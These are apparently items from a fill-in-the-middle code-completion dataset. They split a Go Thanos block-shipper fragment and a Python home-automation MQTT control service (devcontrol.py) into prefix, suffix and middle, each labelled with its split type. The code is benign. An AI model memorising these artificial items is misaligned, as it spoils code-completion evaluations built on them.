dir := filepath.Join(s.dir, n)
fi, err := os.Stat(dir)
if err != nil {
return nil, errors.Wrapf(err, "stat block %v", dir)
}
if !fi.IsDir() {
continue
}
m, err := metadata.ReadFromDir(dir)
if err != nil {
return nil, errors.Wrapf(err, "read metadata for block %v", dir)
}
metas = append(metas, m)
}
sort.Slice(metas, func(i, j int) bool {
return metas[i].BlockMeta.MinTime < metas[j].BlockMeta.MinTime
})
return metas, nil
}
func hardlinkBlock(src, dst string) error {
chunkDir := filepath.Join(dst, block.ChunksDirname)
if err := os.MkdirAll(chunkDir, 0750); err != nil {
return errors.Wrap(err, "create chunks dir")
}
fis, err := os.ReadDir(filepath.Join(src, block.ChunksDirname))
if err != nil {
return errors.Wrap(err, "read chunk dir")
}
files := make([]string, 0, len(fis))
for _, fi := range fis {
files = append(files, fi.Name())
}
for i, fn := range files {
files[i] = filepath.Join(block.ChunksDirname, fn)
}
files = append(files, block.MetaFilename, block.IndexFilename)
for _, fn := range files {
if err := os.Link(filepath.Join(src, fn), filepath.Join(dst, fn)); err != nil {
return errors.Wrapf(err, "hard link file %s", fn)
}
}
return nil
}
// Meta defines the format thanos.shipper.json file that the shipper places in the data directory.
type Meta struct {
Version int `json:"version"`
Uploaded []ulid.ULID `json:"uploaded"`
}
const (
// MetaFilename is the known JSON filename for meta information.
MetaFilename = "thanos.shipper.json"
// MetaVersion1 represents 1 version of meta.
MetaVersion1 = 1
)
// WriteMetaFile writes the given meta into <dir>/thanos.shipper.json.
func WriteMetaFile(logger log.Logger, dir string, meta *Meta) error {
// Make any changes to the file appear atomic.
path := filepath.Join(dir, MetaFilename)
tmp := path + ".tmp"
f, err := os.Create(tmp)
if err != nil {
return err
}
enc := json.NewEncoder(f)
enc.SetIndent("", "\t")
if err := enc.Encode(meta); err != nil {
runutil.CloseWithLogOnErr(logger, f, "write meta file close")
return err
}
if err := f.Close(); err != nil {
return err
}
return renameFile(logger, tmp, path)
}
// ReadMetaFile reads the given meta from <dir>/thanos.shipper.json.
func ReadMetaFile(dir string) (*Meta, error) {
fpath := filepath.Join(dir, filepath.Clean(MetaFilename))
b, err := os.ReadFile(fpath)
if err != nil {
return nil, errors.Wrapf(err, "failed to read %s", fpath)
}
var m Meta
if err := json.Unmarshal(b, &m); err != nil {
return nil, errors.Wrapf(err, "failed to parse %s as JSON: %q", fpath, string(b))
}
if m.Version != MetaVersion1 {
return nil, errors.Errorf("unexpected meta file version %d", m.Version)
}
return &m, nil
}
func renameFile(logger log.Logger, from, to string) error {
if err := os.RemoveAll(to); err != nil {
return err
}
if err := os.Rename(from, to); err != nil {
return err
}
// Directory was renamed; sync parent dir to persist rename.
pdir, err := fileutil.OpenDir(filepath.Dir(to))
if err != nil {
return err
}
if err = fileutil.Fdatasync(pdir); err != nil {
runutil.CloseWithLogOnErr(logger, pdir, "rename file dir close")
return err
}
return pdir.Close()
}
| {
return 0, errors.Wrapf(err, "upload %v", m.ULID)
} | conditional_block |
devcontrol.py | # devcontrol.py
# Home automation device control service
#
# Part of AutoHome
#
# Copyright (c) 2017, Diego Guerrero
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The names of its contributors may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Home automation device control service."""
import sqlite3
import os, sys, signal, subprocess
import json
import time
import select
import shlex
import logging, logging.handlers
import string
import traceback
import paho.mqtt.client as mqtt
from Event import Event
import database
import device
import mqtthandlers
# Exceptions
# ------------------------------------------------------------------------------
class FormatError(Exception):
"""Formatting error. An input string couldn't be parsed as it did not conform to its schema."""
pass
# Signals
# ------------------------------------------------------------------------------
def setsignals():
"""Set termination signals to gracefully close every resource."""
signal.signal(signal.SIGINT, gracefulexit)
signal.signal(signal.SIGTERM, gracefulexit)
signal.signal(signal.SIGHUP, gracefulexit)
def gracefulexit(signalnumber, frame):
"""Close the database, broker and client, and exit the program."""
sys.exit(0) # resources will be closed on their corresponding finally blocks
# Main routines
# ------------------------------------------------------------------------------
def processline(userdata, line):
"""Read a line from stdin and execute the corresponding command."""
def processcmd(command, args, expected_nargs, delegate):
"""Validate the number of arguments and call a delegate handler."""
if len(args) != expected_nargs:
raise FormatError("Wrong number of arguments for '" + command + "', expected " +
str(expected_nargs) + " but got " + str(len(args)))
delegate(userdata, *args)
# commands should use double quotes if an argument has spaces
# in it and escape internal double quotes as necessary
tokens = shlex.split(line)
if len(tokens) < 1:
return
cmd = tokens[0]
args = tokens[1:]
# Specialized handlers; they bridge the user facing interface and the internal implementations;
# see the command dictionary below for more information on each operation
def timed_handler(userdata, *args):
"""Accomodate the input for a non-recurrent event."""
fuzzy = False
if args[3] == "exact":
fuzzy = False
elif args[3] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[3] + "' instead.")
event = Event.create_once(args[4], fuzzy, args[2])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def recurrent_handler(userdata, *args):
"""Accomodate the input for a recurrent event."""
fuzzy = False
if args[5] == "exact":
fuzzy = False
elif args[5] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[5] + "' instead.")
event = Event.create_recurrent(args[6], fuzzy, args[2], args[3], args[4])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def devlist_handler(userdata, *args):
"""Transform the raw devlist into a human readable list."""
for (dev, connected) in database.devlist(userdata["cursor"]):
if dev == "devmaster":
continue
if connected:
print(shlex.quote("+" + dev), end=" ")
else:
print(shlex.quote("-" + dev), end=" ")
print()
def guestlist_handler(userdata, *args):
"""Transform the raw guestlist into a human readable list."""
for guest in userdata["guestlist"]:
print(shlex.quote(guest), end=" ")
print()
def info_handler(userdata, *args):
"""Transform the raw info list into a human readable list."""
info = database.devinfo(userdata["cursor"], args[0])
if info is None:
print("can't find user " + args[0])
return
stype, connected, status = info
print(shlex.quote(("+" if connected else "-") + stype), end=" ")
print(shlex.quote(status))
def schedule_handler(userdata, *args):
"""Transform the raw schedule list into a human readable list."""
for event in database.devschedule(userdata["cursor"], args[0]):
print(str(event))
print("")
# Command dictionary
commands = {
# "command name": (expected_nargs, delegate)
"add": (4, device.add),
# add <guestname> <displayname> <type> <status>
# add a device to the network
"rename": (2, device.rename),
# rename <displayname> <newdisplayname>
# change the public display name of a device in the network
"del": (1, device.delete),
# del <displayname>
# delete a device from the network
"sync": (1, device.sync),
# sync <displayname>
# send a time synchronization message to the specified device
"ping": (1, device.ping),
# ping <displayname>
# check a device is still responsive by sending a ping message
"askstatus": (1, device.askstatus),
# askstatus <displayname>
# ask the device for its current status
"cmd": (2, device.execute),
# cmd <displayname> <operation>
# send immediate command to device;
# arguments to the operation should be within the operation argument, e.g. 'dimmer 126'
# the operation must be valid (and have valid arguments) for the device type;
# otherwise, the command will fail silently
"timed": (5, timed_handler),
# timed (add|del) <displayname> <date> (exact|fuzzy) <operation>
# schedule a command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <date> must be formatted as a unix integer timestamp in the future,
# otherwise the command is a no-op;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message;
"recurrent": (7, recurrent_handler),
# recurrent (add|del) <displayname> <weekday> <hours> <minutes> (exact|fuzzy) <operation>
# schedule a recurrent command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <weekday> must be a number between 0 and 9. Passing 0 signals the operation should execute
# every day; 1-7 signal it should be executed on Mon-Sun respectively; 8 signals Mon-Fri; and
# 9 signals Sat-Sun;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message
"clear": (1, device.clearschedule),
# clear <displayname>
# clear the schedule for a given device
"devlist": (0, devlist_handler),
# devlist
# retrieve verified device list
# respond with a list of devices, using the format: ('(-|+)<displayname>' )*
# where every name is prepended with a positive sign '+' if the device is connected | # respond with a list of unverified devices, using the format ('<displayname>' )*
# note that every guest is connected (otherwise it would just be removed from the list)
"info": (1, info_handler),
# info <displayname>
# retrieve device profile
# respond with the list of device properties in the profile using the format
# <connected><type> <status>
# where connected is formatted as + if the device is connected as - if it is not, e.g.
# '-sonoff on' indicates a disconnected sonoff device with a status of 'on'
"schedule": (1, schedule_handler)
# schedule <displayname>
# retrieve device schedule
# respond with a list of scheduled commands for the given device using the formats
# timed <date> (exact|fuzzy) <operation> <args>
# recurrent <weekday> <hours> <minutes> (exact|fuzzy) <operation> [<args>]
# for timed and recurrent operations respectively;
# the specifics of each formats are the same as for their schedule counterparts
}
try:
(expected_nargs, delegate) = commands[cmd]
except KeyError:
print("Unrecognized command, skipping", file=sys.stderr)
return
processcmd(cmd, args, expected_nargs, delegate)
def genconfig(infilename, definitions, outfilename):
"""Generate an appropriate Mosquitto configuration file."""
with open(infilename, "r") as infile:
text = infile.read()
template = string.Template(text)
text = template.safe_substitute(definitions)
with open(outfilename, "w") as outfile:
outfile.write(text)
def loop(mosquitto, configuration, db, cursor, guestlist, logger):
"""Main MQTT/REST API event loop."""
userdata = {"done": False, "database": db, "cursor": cursor,
"configuration": configuration, "client": None, "guestlist": guestlist}
client = None
try:
client = mqtt.Client(userdata=userdata)
client.username_pw_set(configuration["superuser"], configuration["superpass"])
client.on_connect = mqtthandlers.onconnect
client.on_disconnect = mqtthandlers.ondisconnect
client.on_message = mqtthandlers.onmessage
userdata["client"] = client
client.tls_set(configuration["certificate"])
client.connect(configuration["devhostname"], configuration["devmqttport"], keepalive=300)
mqttsocket = client.socket()
print("AutoHome public interface started", file=sys.stderr)
while not userdata["done"]:
try:
# timeout is set to a value lesser than the keepalive period, otherwise
# loop_misc() may not be called on time and the server can close the connection
available = select.select([sys.stdin, mqttsocket, mosquitto.stderr], [], [], 30)
if mqttsocket in available[0]:
client.loop_read()
if sys.stdin in available[0]:
try:
processline(userdata, input())
db.commit()
except FormatError as e:
print("Error processing line: " + str(e), file=sys.stderr)
except EOFError:
userdata["done"] = True
if client.want_write():
client.loop_write()
client.loop_misc()
if mosquitto.stderr in available[0]:
line = mosquitto.stderr.readline()
logger.debug(line.strip().decode("utf8"))
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
print("Unexpected exception", file=sys.stderr)
print(e, file=sys.stderr)
traceback.print_tb(e.__traceback__, file=sys.stderr)
time.sleep(10) # instead of crashing and losing everything, try to continue;
# if the problem was transient, the error is logged and the
# system is still available; if the problem is fatal,
# wait so as to not generate infinite logfiles with
# succesive exceptions, e.g. because the sql database has
# been corrupted and every attempt to access it fails
finally:
client.disconnect()
def main():
"""Program entry point."""
setsignals()
configuration = None
guestlist = set()
configfilename = sys.argv[1] if len(sys.argv) > 1 else "configuration.json"
guestlist.add("pipe")
scriptdir = os.path.dirname(os.path.realpath(__file__))
try:
with open(configfilename) as configfile:
configuration = json.loads(configfile.read())
except IOError:
print("Can't open configuration file", file=sys.stderr)
return
# the relative path is necessary for the mosquitto configuration file
# the join adds a trailing os-specific dir separator
configuration["relpath"] = os.path.join(os.path.relpath("./", scriptdir), "")
with sqlite3.connect(configuration["devdbfile"]) as db:
cursor = db.cursor()
try:
database.setupdb(cursor)
database.setsuperuser(cursor, configuration["superuser"], configuration["superpass"])
except KeyError:
print("Incomplete configuration file", file=sys.stderr)
return
except sqlite3.Error:
print("Can't set up the database and super user", file=sys.stderr)
return
db.commit()
genconfig(os.path.join(scriptdir, "mosquitto.conf.in"), configuration,
os.path.join(scriptdir, "mosquitto.conf"))
with subprocess.Popen(["mosquitto", "-c", os.path.join(scriptdir, "mosquitto.conf")],
stdout=subprocess.DEVNULL, stderr=subprocess.PIPE,
stdin=subprocess.DEVNULL, cwd=scriptdir) as mosquitto:
time.sleep(0.5) # let mosquitto broker start up
handler = None
try:
logger = logging.getLogger(__name__)
handler = logging.handlers.RotatingFileHandler(os.path.join(scriptdir, "mosquitto.log"),
"a", 1024 * 1024, 10)
handler.setFormatter(logging.Formatter())
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
print("MQTT broker started", file=sys.stderr)
loop(mosquitto, configuration, db, cursor, guestlist, logger)
finally:
mosquitto.terminate()
if handler is not None:
remaining = mosquitto.stderr.read()
logger.debug(remaining.strip().decode("utf8"))
handler.close()
if __name__ == "__main__":
main() | # and a negative sign '-' if it is not
"guestlist": (0, guestlist_handler),
# guestlist
# retrieve the guestlist | random_line_split |
devcontrol.py | # devcontrol.py
# Home automation device control service
#
# Part of AutoHome
#
# Copyright (c) 2017, Diego Guerrero
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The names of its contributors may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Home automation device control service."""
import sqlite3
import os, sys, signal, subprocess
import json
import time
import select
import shlex
import logging, logging.handlers
import string
import traceback
import paho.mqtt.client as mqtt
from Event import Event
import database
import device
import mqtthandlers
# Exceptions
# ------------------------------------------------------------------------------
class FormatError(Exception):
"""Formatting error. An input string couldn't be parsed as it did not conform to its schema."""
pass
# Signals
# ------------------------------------------------------------------------------
def setsignals():
"""Set termination signals to gracefully close every resource."""
signal.signal(signal.SIGINT, gracefulexit)
signal.signal(signal.SIGTERM, gracefulexit)
signal.signal(signal.SIGHUP, gracefulexit)
def gracefulexit(signalnumber, frame):
"""Close the database, broker and client, and exit the program."""
sys.exit(0) # resources will be closed on their corresponding finally blocks
# Main routines
# ------------------------------------------------------------------------------
def processline(userdata, line):
"""Read a line from stdin and execute the corresponding command."""
def processcmd(command, args, expected_nargs, delegate):
"""Validate the number of arguments and call a delegate handler."""
if len(args) != expected_nargs:
raise FormatError("Wrong number of arguments for '" + command + "', expected " +
str(expected_nargs) + " but got " + str(len(args)))
delegate(userdata, *args)
# commands should use double quotes if an argument has spaces
# in it and escape internal double quotes as necessary
tokens = shlex.split(line)
if len(tokens) < 1:
return
cmd = tokens[0]
args = tokens[1:]
# Specialized handlers; they bridge the user facing interface and the internal implementations;
# see the command dictionary below for more information on each operation
def timed_handler(userdata, *args):
"""Accomodate the input for a non-recurrent event."""
fuzzy = False
if args[3] == "exact":
fuzzy = False
elif args[3] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[3] + "' instead.")
event = Event.create_once(args[4], fuzzy, args[2])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def recurrent_handler(userdata, *args):
"""Accomodate the input for a recurrent event."""
fuzzy = False
if args[5] == "exact":
fuzzy = False
elif args[5] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[5] + "' instead.")
event = Event.create_recurrent(args[6], fuzzy, args[2], args[3], args[4])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def devlist_handler(userdata, *args):
"""Transform the raw devlist into a human readable list."""
for (dev, connected) in database.devlist(userdata["cursor"]):
if dev == "devmaster":
continue
if connected:
print(shlex.quote("+" + dev), end=" ")
else:
print(shlex.quote("-" + dev), end=" ")
print()
def guestlist_handler(userdata, *args):
"""Transform the raw guestlist into a human readable list."""
for guest in userdata["guestlist"]:
print(shlex.quote(guest), end=" ")
print()
def info_handler(userdata, *args):
"""Transform the raw info list into a human readable list."""
info = database.devinfo(userdata["cursor"], args[0])
if info is None:
print("can't find user " + args[0])
return
stype, connected, status = info
print(shlex.quote(("+" if connected else "-") + stype), end=" ")
print(shlex.quote(status))
def schedule_handler(userdata, *args):
"""Transform the raw schedule list into a human readable list."""
for event in database.devschedule(userdata["cursor"], args[0]):
print(str(event))
print("")
# Command dictionary
commands = {
# "command name": (expected_nargs, delegate)
"add": (4, device.add),
# add <guestname> <displayname> <type> <status>
# add a device to the network
"rename": (2, device.rename),
# rename <displayname> <newdisplayname>
# change the public display name of a device in the network
"del": (1, device.delete),
# del <displayname>
# delete a device from the network
"sync": (1, device.sync),
# sync <displayname>
# send a time synchronization message to the specified device
"ping": (1, device.ping),
# ping <displayname>
# check a device is still responsive by sending a ping message
"askstatus": (1, device.askstatus),
# askstatus <displayname>
# ask the device for its current status
"cmd": (2, device.execute),
# cmd <displayname> <operation>
# send immediate command to device;
# arguments to the operation should be within the operation argument, e.g. 'dimmer 126'
# the operation must be valid (and have valid arguments) for the device type;
# otherwise, the command will fail silently
"timed": (5, timed_handler),
# timed (add|del) <displayname> <date> (exact|fuzzy) <operation>
# schedule a command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <date> must be formatted as a unix integer timestamp in the future,
# otherwise the command is a no-op;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message;
"recurrent": (7, recurrent_handler),
# recurrent (add|del) <displayname> <weekday> <hours> <minutes> (exact|fuzzy) <operation>
# schedule a recurrent command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <weekday> must be a number between 0 and 9. Passing 0 signals the operation should execute
# every day; 1-7 signal it should be executed on Mon-Sun respectively; 8 signals Mon-Fri; and
# 9 signals Sat-Sun;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message
"clear": (1, device.clearschedule),
# clear <displayname>
# clear the schedule for a given device
"devlist": (0, devlist_handler),
# devlist
# retrieve verified device list
# respond with a list of devices, using the format: ('(-|+)<displayname>' )*
# where every name is prepended with a positive sign '+' if the device is connected
# and a negative sign '-' if it is not
"guestlist": (0, guestlist_handler),
# guestlist
# retrieve the guestlist
# respond with a list of unverified devices, using the format ('<displayname>' )*
# note that every guest is connected (otherwise it would just be removed from the list)
"info": (1, info_handler),
# info <displayname>
# retrieve device profile
# respond with the list of device properties in the profile using the format
# <connected><type> <status>
# where connected is formatted as + if the device is connected as - if it is not, e.g.
# '-sonoff on' indicates a disconnected sonoff device with a status of 'on'
"schedule": (1, schedule_handler)
# schedule <displayname>
# retrieve device schedule
# respond with a list of scheduled commands for the given device using the formats
# timed <date> (exact|fuzzy) <operation> <args>
# recurrent <weekday> <hours> <minutes> (exact|fuzzy) <operation> [<args>]
# for timed and recurrent operations respectively;
# the specifics of each formats are the same as for their schedule counterparts
}
try:
(expected_nargs, delegate) = commands[cmd]
except KeyError:
print("Unrecognized command, skipping", file=sys.stderr)
return
processcmd(cmd, args, expected_nargs, delegate)
def genconfig(infilename, definitions, outfilename):
"""Generate an appropriate Mosquitto configuration file."""
with open(infilename, "r") as infile:
text = infile.read()
template = string.Template(text)
text = template.safe_substitute(definitions)
with open(outfilename, "w") as outfile:
outfile.write(text)
def loop(mosquitto, configuration, db, cursor, guestlist, logger):
|
def main():
"""Program entry point."""
setsignals()
configuration = None
guestlist = set()
configfilename = sys.argv[1] if len(sys.argv) > 1 else "configuration.json"
guestlist.add("pipe")
scriptdir = os.path.dirname(os.path.realpath(__file__))
try:
with open(configfilename) as configfile:
configuration = json.loads(configfile.read())
except IOError:
print("Can't open configuration file", file=sys.stderr)
return
# the relative path is necessary for the mosquitto configuration file
# the join adds a trailing os-specific dir separator
configuration["relpath"] = os.path.join(os.path.relpath("./", scriptdir), "")
with sqlite3.connect(configuration["devdbfile"]) as db:
cursor = db.cursor()
try:
database.setupdb(cursor)
database.setsuperuser(cursor, configuration["superuser"], configuration["superpass"])
except KeyError:
print("Incomplete configuration file", file=sys.stderr)
return
except sqlite3.Error:
print("Can't set up the database and super user", file=sys.stderr)
return
db.commit()
genconfig(os.path.join(scriptdir, "mosquitto.conf.in"), configuration,
os.path.join(scriptdir, "mosquitto.conf"))
with subprocess.Popen(["mosquitto", "-c", os.path.join(scriptdir, "mosquitto.conf")],
stdout=subprocess.DEVNULL, stderr=subprocess.PIPE,
stdin=subprocess.DEVNULL, cwd=scriptdir) as mosquitto:
time.sleep(0.5) # let mosquitto broker start up
handler = None
try:
logger = logging.getLogger(__name__)
handler = logging.handlers.RotatingFileHandler(os.path.join(scriptdir, "mosquitto.log"),
"a", 1024 * 1024, 10)
handler.setFormatter(logging.Formatter())
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
print("MQTT broker started", file=sys.stderr)
loop(mosquitto, configuration, db, cursor, guestlist, logger)
finally:
mosquitto.terminate()
if handler is not None:
remaining = mosquitto.stderr.read()
logger.debug(remaining.strip().decode("utf8"))
handler.close()
if __name__ == "__main__":
main()
| """Main MQTT/REST API event loop."""
userdata = {"done": False, "database": db, "cursor": cursor,
"configuration": configuration, "client": None, "guestlist": guestlist}
client = None
try:
client = mqtt.Client(userdata=userdata)
client.username_pw_set(configuration["superuser"], configuration["superpass"])
client.on_connect = mqtthandlers.onconnect
client.on_disconnect = mqtthandlers.ondisconnect
client.on_message = mqtthandlers.onmessage
userdata["client"] = client
client.tls_set(configuration["certificate"])
client.connect(configuration["devhostname"], configuration["devmqttport"], keepalive=300)
mqttsocket = client.socket()
print("AutoHome public interface started", file=sys.stderr)
while not userdata["done"]:
try:
# timeout is set to a value lesser than the keepalive period, otherwise
# loop_misc() may not be called on time and the server can close the connection
available = select.select([sys.stdin, mqttsocket, mosquitto.stderr], [], [], 30)
if mqttsocket in available[0]:
client.loop_read()
if sys.stdin in available[0]:
try:
processline(userdata, input())
db.commit()
except FormatError as e:
print("Error processing line: " + str(e), file=sys.stderr)
except EOFError:
userdata["done"] = True
if client.want_write():
client.loop_write()
client.loop_misc()
if mosquitto.stderr in available[0]:
line = mosquitto.stderr.readline()
logger.debug(line.strip().decode("utf8"))
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
print("Unexpected exception", file=sys.stderr)
print(e, file=sys.stderr)
traceback.print_tb(e.__traceback__, file=sys.stderr)
time.sleep(10) # instead of crashing and losing everything, try to continue;
# if the problem was transient, the error is logged and the
# system is still available; if the problem is fatal,
# wait so as to not generate infinite logfiles with
# succesive exceptions, e.g. because the sql database has
# been corrupted and every attempt to access it fails
finally:
client.disconnect() | identifier_body |
devcontrol.py | # devcontrol.py
# Home automation device control service
#
# Part of AutoHome
#
# Copyright (c) 2017, Diego Guerrero
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The names of its contributors may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Home automation device control service."""
import sqlite3
import os, sys, signal, subprocess
import json
import time
import select
import shlex
import logging, logging.handlers
import string
import traceback
import paho.mqtt.client as mqtt
from Event import Event
import database
import device
import mqtthandlers
# Exceptions
# ------------------------------------------------------------------------------
class FormatError(Exception):
"""Formatting error. An input string couldn't be parsed as it did not conform to its schema."""
pass
# Signals
# ------------------------------------------------------------------------------
def setsignals():
"""Set termination signals to gracefully close every resource."""
signal.signal(signal.SIGINT, gracefulexit)
signal.signal(signal.SIGTERM, gracefulexit)
signal.signal(signal.SIGHUP, gracefulexit)
def gracefulexit(signalnumber, frame):
"""Close the database, broker and client, and exit the program."""
sys.exit(0) # resources will be closed on their corresponding finally blocks
# Main routines
# ------------------------------------------------------------------------------
def processline(userdata, line):
"""Read a line from stdin and execute the corresponding command."""
def processcmd(command, args, expected_nargs, delegate):
"""Validate the number of arguments and call a delegate handler."""
if len(args) != expected_nargs:
raise FormatError("Wrong number of arguments for '" + command + "', expected " +
str(expected_nargs) + " but got " + str(len(args)))
delegate(userdata, *args)
# commands should use double quotes if an argument has spaces
# in it and escape internal double quotes as necessary
tokens = shlex.split(line)
if len(tokens) < 1:
return
cmd = tokens[0]
args = tokens[1:]
# Specialized handlers; they bridge the user facing interface and the internal implementations;
# see the command dictionary below for more information on each operation
def timed_handler(userdata, *args):
"""Accomodate the input for a non-recurrent event."""
fuzzy = False
if args[3] == "exact":
fuzzy = False
elif args[3] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[3] + "' instead.")
event = Event.create_once(args[4], fuzzy, args[2])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def recurrent_handler(userdata, *args):
"""Accomodate the input for a recurrent event."""
fuzzy = False
if args[5] == "exact":
fuzzy = False
elif args[5] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[5] + "' instead.")
event = Event.create_recurrent(args[6], fuzzy, args[2], args[3], args[4])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def devlist_handler(userdata, *args):
"""Transform the raw devlist into a human readable list."""
for (dev, connected) in database.devlist(userdata["cursor"]):
if dev == "devmaster":
continue
if connected:
print(shlex.quote("+" + dev), end=" ")
else:
print(shlex.quote("-" + dev), end=" ")
print()
def guestlist_handler(userdata, *args):
"""Transform the raw guestlist into a human readable list."""
for guest in userdata["guestlist"]:
print(shlex.quote(guest), end=" ")
print()
def info_handler(userdata, *args):
"""Transform the raw info list into a human readable list."""
info = database.devinfo(userdata["cursor"], args[0])
if info is None:
print("can't find user " + args[0])
return
stype, connected, status = info
print(shlex.quote(("+" if connected else "-") + stype), end=" ")
print(shlex.quote(status))
def schedule_handler(userdata, *args):
"""Transform the raw schedule list into a human readable list."""
for event in database.devschedule(userdata["cursor"], args[0]):
print(str(event))
print("")
# Command dictionary
commands = {
